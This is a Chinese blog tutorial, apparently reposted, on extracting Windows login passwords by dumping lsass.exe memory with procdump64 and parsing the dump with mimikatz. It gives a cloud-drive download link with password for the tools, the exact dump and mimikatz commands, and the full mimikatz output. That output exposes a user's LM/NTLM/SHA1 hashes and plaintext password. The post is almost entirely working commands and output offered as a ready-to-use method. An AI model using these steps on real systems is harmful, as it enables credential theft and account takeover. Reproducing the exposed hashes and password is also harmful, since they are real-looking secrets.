兩步完成利用procdump64+mimikatz獲取win使用者密碼
阿新 • • 發佈:2021-06-25
使用procdump64+mimikatz可實現從記憶體中獲取明文密碼
工具
1 |
連結:https: //pan .baidu.com /s/1gNc9qLcNSNBohIVrAiqShw 密碼:fc38
|
首先得先獲取到記憶體檔案lsass.exe程序,它用於本地安全和登陸策略,一般在程序管理器中能看到, 比如這樣
1.匯出lsass.exe
1 |
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
|
(注:必須使用管理員許可權)
1 2 3 4 5 6 7 8 9 |
ProcDump v8.0 - Writes process dump files Copyright (C) 2009-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards
[15:33:26] Dump 1 initiated: C:\Users\chenglee\Desktop\Procdump\lsass.dmp
[15:33:28] Dump 1 writing: Estimated dump file size is 34 MB.
[15:33:28] Dump 1 complete: 34 MB written in 1.4 seconds [15:33:28] Dump count reached.
|
2.執行mimikatz
1 |
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
|
(注:必須使用管理員許可權)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 |
ECHO 處於開啟狀態。
. #####. mimikatz 2.1.1 (x64) built on Jun 16 2018 18:49:05 - lil!
. ## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http: //pingcastle .com / http: //mysmartlogon .com ***/
mimikatz(commandline) # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'
mimikatz(commandline) # sekurlsa::logonPasswords full
Opening : 'lsass.dmp' file for minidump...
Authentication Id : 0 ; 137859 (00000000:00021a83)
Session : Interactive from 1
User Name : chenglee
Domain : chenglee-PC
Logon Server : CHENGLEE-PC
Logon Time : 2018 /7/25 15:06:35
SID : S-1-5-21-452281122-3045282507-3243563612-1000
msv :
[00000003] Primary
* Username : chenglee
* Domain : chenglee-PC
* LM : 9cffd5e7eefa14babacbf0b4adf55fde
* NTLM : 8d0f8e1a18236379538411a9056799f5
* SHA1 : 989281f47698b73e026160e842d86bc64c9e3c20
tspkg :
* Username : chenglee
* Domain : chenglee-PC
* Password : lizhenghua
wdigest :
* Username : chenglee
* Domain : chenglee-PC
* Password : lizhenghua
kerberos :
* Username : chenglee
* Domain : chenglee-PC
* Password : lizhenghua
ssp :
credman :
Authentication Id : 0 ; 137821 (00000000:00021a5d)
Session : Interactive from 1
User Name : chenglee
Domain : chenglee-PC
Logon Server : CHENGLEE-PC
Logon Time : 2018 /7/25 15:06:35
SID : S-1-5-21-452281122-3045282507-3243563612-1000
msv :
[00000003] Primary
* Username : chenglee
* Domain : chenglee-PC
* LM : 9cffd5e7eefa14babacbf0b4adf55fde
* NTLM : 8d0f8e1a18236379538411a9056799f5
* SHA1 : 989281f47698b73e026160e842d86bc64c9e3c20
tspkg :
* Username : chenglee
* Domain : chenglee-PC
* Password : lizhenghua
wdigest :
* Username : chenglee
* Domain : chenglee-PC
* Password : lizhenghua
kerberos :
* Username : chenglee
* Domain : chenglee-PC
* Password : lizhenghua
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2018 /7/25 15:06:15
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : CHENGLEE-PC$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2018 /7/25 15:06:15
SID : S-1-5-20
msv :
tspkg :
wdigest :
* Username : CHENGLEE-PC$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : chenglee-pc$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 48630 (00000000:0000bdf6)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2018 /7/25 15:06:06
SID :
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : CHENGLEE-PC$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2018 /7/25 15:06:05
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : CHENGLEE-PC$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : chenglee-pc$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
mimikatz(commandline) # exit
Bye!
|
看, 密碼[lizhenghua]處於明文暴露狀態.
如果不是使用管理員模式執行cmd會報錯,
posted @2018-07-25 15:58夏天公子 閱讀(17902) 評論(2)編輯收藏舉報